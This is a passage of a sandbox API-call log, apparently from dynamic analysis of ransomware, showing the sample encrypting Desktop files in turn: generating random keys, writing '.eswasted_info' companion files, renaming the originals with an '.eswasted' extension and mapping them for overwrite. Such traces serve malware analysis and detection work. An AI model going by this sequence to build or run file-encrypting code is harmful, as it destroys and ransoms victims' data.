1 [0072.260] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.261] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.261] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.270] SetEndOfFile (hFile=0x110) returned 1 [0072.320] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.320] CloseHandle (hObject=0x110) returned 1 [0072.322] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.322] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.323] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.323] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.323] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fsquCy1KdhtG3k.pptx") returned 61 [0072.323] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ebff0 [0072.323] lstrcpyW (in: lpString1=0x4ec06a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.323] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.323] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.324] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.324] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fsquCy1KdhtG3k.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsqucy1kdhtg3k.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.325] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.326] SetEndOfFile (hFile=0x110) returned 1 [0072.327] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.327] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.327] lstrcpyW (in: lpString1=0x4ec06a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fsquCy1KdhtG3k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsqucy1kdhtg3k.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fsquCy1KdhtG3k.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsqucy1kdhtg3k.pptx.eswasted")) returned 1 [0072.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fsquCy1KdhtG3k.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsqucy1kdhtg3k.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.329] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.333] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.334] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.334] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.334] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.335] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.335] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.344] SetEndOfFile (hFile=0x110) returned 1 [0072.347] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.347] CloseHandle (hObject=0x110) returned 1 [0072.348] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.348] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.349] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.349] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaFLqw82AghlGI.wav") returned 60 [0072.349] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x282) returned 0x4ebff0 [0072.349] lstrcpyW (in: lpString1=0x4ec068, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.349] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.349] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.350] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.350] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaFLqw82AghlGI.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gaflqw82aghlgi.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.352] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.353] SetEndOfFile (hFile=0x110) returned 1 [0072.354] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.354] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.354] lstrcpyW (in: lpString1=0x4ec068, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaFLqw82AghlGI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gaflqw82aghlgi.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaFLqw82AghlGI.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gaflqw82aghlgi.wav.eswasted")) returned 1 [0072.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GaFLqw82AghlGI.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gaflqw82aghlgi.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.356] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.357] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.358] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.358] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.358] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.359] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.359] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.370] SetEndOfFile (hFile=0x110) returned 1 [0072.373] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.373] CloseHandle (hObject=0x110) returned 1 [0072.375] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.375] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.376] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.376] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.376] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hEiH Kb1m.m4a") returned 55 [0072.376] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4ebff0 [0072.376] lstrcpyW (in: lpString1=0x4ec05e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.376] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.376] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.377] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.377] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hEiH Kb1m.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heih kb1m.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.379] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.380] SetEndOfFile (hFile=0x110) returned 1 [0072.381] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.381] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.381] lstrcpyW (in: lpString1=0x4ec05e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hEiH Kb1m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heih kb1m.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hEiH Kb1m.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heih kb1m.m4a.eswasted")) returned 1 [0072.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hEiH Kb1m.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heih kb1m.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.382] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.385] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.385] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.385] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.385] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.386] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.386] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.394] SetEndOfFile (hFile=0x110) returned 1 [0072.489] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.489] CloseHandle (hObject=0x110) returned 1 [0072.491] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.491] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.491] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.491] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KCTzy.mp4") returned 51 [0072.492] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ebff0 [0072.492] lstrcpyW (in: lpString1=0x4ec056, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.492] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.492] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.492] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.492] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KCTzy.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kctzy.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.493] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.494] SetEndOfFile (hFile=0x110) returned 1 [0072.495] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.495] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.495] lstrcpyW (in: lpString1=0x4ec056, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KCTzy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kctzy.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KCTzy.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kctzy.mp4.eswasted")) returned 1 [0072.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KCTzy.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kctzy.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.505] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.507] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.507] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.507] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.507] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.508] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.508] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.516] SetEndOfFile (hFile=0x110) returned 1 [0072.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.519] CloseHandle (hObject=0x110) returned 1 [0072.521] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.521] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.521] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.521] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kd7alFYBAisE_ zrNlnI.wav") returned 66 [0072.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28e) returned 0x4ebff0 [0072.522] lstrcpyW (in: lpString1=0x4ec074, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.522] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.522] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.522] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.522] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kd7alFYBAisE_ zrNlnI.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kd7alfybaise_ zrnlni.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.524] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.524] SetEndOfFile (hFile=0x110) returned 1 [0072.525] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.525] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.525] lstrcpyW (in: lpString1=0x4ec074, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kd7alFYBAisE_ zrNlnI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kd7alfybaise_ zrnlni.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kd7alFYBAisE_ zrNlnI.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kd7alfybaise_ zrnlni.wav.eswasted")) returned 1 [0072.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kd7alFYBAisE_ zrNlnI.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kd7alfybaise_ zrnlni.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.527] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.529] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0072.530] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.530] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.530] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0072.531] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0072.531] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.570] SetEndOfFile (hFile=0x110) returned 1 [0072.661] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.661] CloseHandle (hObject=0x110) returned 1 [0072.663] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0072.663] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0072.663] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0072.663] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.663] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QeZV.mp4") returned 50 [0072.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26e) returned 0x4ebff0 [0072.664] lstrcpyW (in: lpString1=0x4ec054, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.664] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.664] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0072.664] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.664] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QeZV.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qezv.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.665] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.666] SetEndOfFile (hFile=0x110) returned 1 [0072.666] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.666] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.666] lstrcpyW (in: lpString1=0x4ec054, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QeZV.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qezv.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QeZV.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qezv.mp4.eswasted")) returned 1 [0072.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QeZV.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qezv.mp4.eswasted"), 